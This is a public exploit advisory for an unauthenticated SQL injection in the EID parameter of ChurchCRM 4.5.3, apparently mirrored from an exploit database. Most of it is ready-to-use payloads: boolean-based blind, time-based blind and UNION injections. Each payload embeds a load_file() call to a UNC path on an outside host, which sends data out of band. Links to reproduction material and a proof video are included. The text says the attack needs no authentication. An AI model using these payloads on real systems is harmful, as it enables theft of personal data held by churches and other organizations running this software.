Share
## https://sploitus.com/exploit?id=PACKETSTORM:171142
## Title: ChurchCRM-4.5.3-121fcc1-SQLi  
## Author: nu11secur1ty  
## Date: 02.27.2023  
## Vendor: http://churchcrm.io/  
## Software: https://github.com/ChurchCRM/CRM  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
In the manual insertion point 1 - parameter `EID` appears to be  
vulnerable to SQL injection attacks.  
No need for cookies, no need admin authentication and etc.  
The attacker easily can steal information from this system by using  
this vulnerability.  
  
STATUS: HIGH Vulnerability - CRITICAL  
  
[+]Payload:  
```mysql  
---  
Parameter: EID (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: EID=(select  
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))  
OR NOT 2407=2407  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: EID=(select  
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))  
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)  
  
Type: UNION query  
Title: MySQL UNION query (UTF8) - 11 columns  
Payload: EID=(select  
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))  
UNION ALL SELECT  
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)  
  
## Proof and Exploit:  
[href](https://streamable.com/1eqhw2)  
  
## Time spend:  
01:00:00